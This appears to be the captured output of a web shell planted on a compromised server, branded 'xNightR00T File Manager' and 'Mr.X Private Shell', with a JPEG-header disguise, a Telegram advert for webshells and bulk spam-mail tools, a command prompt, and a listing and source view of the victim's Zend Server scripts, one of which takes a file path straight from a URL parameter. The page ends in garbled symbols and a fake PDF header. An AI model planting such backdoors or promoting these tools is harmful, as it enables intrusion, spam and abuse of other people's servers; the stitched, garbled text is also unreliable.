xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

/// Include our db settings
require_once dirname(__FILE__) . '/zs_db_settings.php';

class ZendDbOptimizer
{

    protected $m_dbConnection;
    protected $m_dbSettings;

    /**
     * Construct ZendDbOptimizer class. This function also establishes a db connection based
     * on the INI file zend_database.ini
     */
    public function __construct() {
        try {

            $this->m_dbSettings = ZSDbSettings::fromIni($_GET['zsDir'] . "/etc/zend_database.ini");
            if ( $this->m_dbSettings->isMysql() ) {
                $this->m_dbConnection = new PDO("mysql:host=" . $this->m_dbSettings->getDbHost() . ";port=" . $this->m_dbSettings->getDbPort() . ";dbname=" . $this->m_dbSettings->getDbName(),
                                                $this->m_dbSettings->getDbUser(),
                                                $this->m_dbSettings->getDbPassword());
                $this->m_dbConnection->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_WARNING);
            } else {
                /// SQLite

            }

        } catch ( PDOException $exec ) {

        }
    }

    /**
     * Fetch list of tables from the database and
     * perform an OPTIMIZE query on them
     * Note: this function only works for MYSQL and does nothing for SQLITE database
     */
    public function optimize() {
        if ( $this->m_dbSettings->isMysql() ) {
            $rows = $this->m_dbConnection->query("show tables")->fetchAll();
            foreach ($rows as $row ) {
                echo "Optimzing table " . $row[0] . "\n";
                $optimizeSql = "OPTIMIZE TABLE " . $row[0];
                $statement = $this->m_dbConnection->prepare($optimizeSql);
                $statement->execute();
                $statement->closeCursor();
            }
        }
    }
}

/**
 * Main
 */

ini_set("error_reporting", E_ALL);
ini_set("output_buffering", 0);
ini_set("max_execution_time", 60 * 60); // one hour timeout
ini_set("html_errors", 0);
ini_set("memory_limit", -1);

$optimizer = new ZendDbOptimizer();
$optimizer->optimize();

Filemanager

Name Type Size Permission Actions
azure-plugins Folder 0755
minify Folder 0755
plugins Folder 0755
zray-cleanup-scripts Folder 0755
devbar_footer.html File 18.69 KB 0644
devbar_footer_azure.html File 16.58 KB 0644
devbar_footer_sa.html File 16.54 KB 0644
devbar_header.html File 1.37 KB 0644
zend_apc_wrapper.php File 2.01 KB 0644
zend_modify_vhost.php File 26.11 KB 0644
zs_apm_db_handler.php File 3.59 KB 0644
zs_component_upgrader.php File 17.99 KB 0644
zs_create_databases.php File 7.69 KB 0644
zs_db_settings.php File 2.15 KB 0644
zs_deployment_db_handler.php File 20.77 KB 0644
zs_devbar_db_handler.php File 3.22 KB 0644
zs_gui_db_handler.php File 15.35 KB 0644
zs_ini_parser.php File 14.91 KB 0644
zs_jq_db_handler.php File 11.81 KB 0644
zs_maintenance.php File 31.99 KB 0644
zs_merge_ini.php File 9.37 KB 0644
zs_monitor_2019_0_0_db_handler.php File 2.83 KB 0644
zs_monitor_db_handler.php File 5.44 KB 0644
zs_optimize_tables.php File 2.02 KB 0644
zs_pagecache_db_handler.php File 2.61 KB 0644
zs_pagecache_purge_db_handler.php File 1.57 KB 0644
zs_product_definitions.php File 65 B 0644
zs_statistics_db_handler.php File 9.05 KB 0644
zs_statsd_db_handler.php File 2.13 KB 0644
zs_tracing_db_handler.php File 3.53 KB 0644
zs_zsd_db_handler.php File 43.89 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1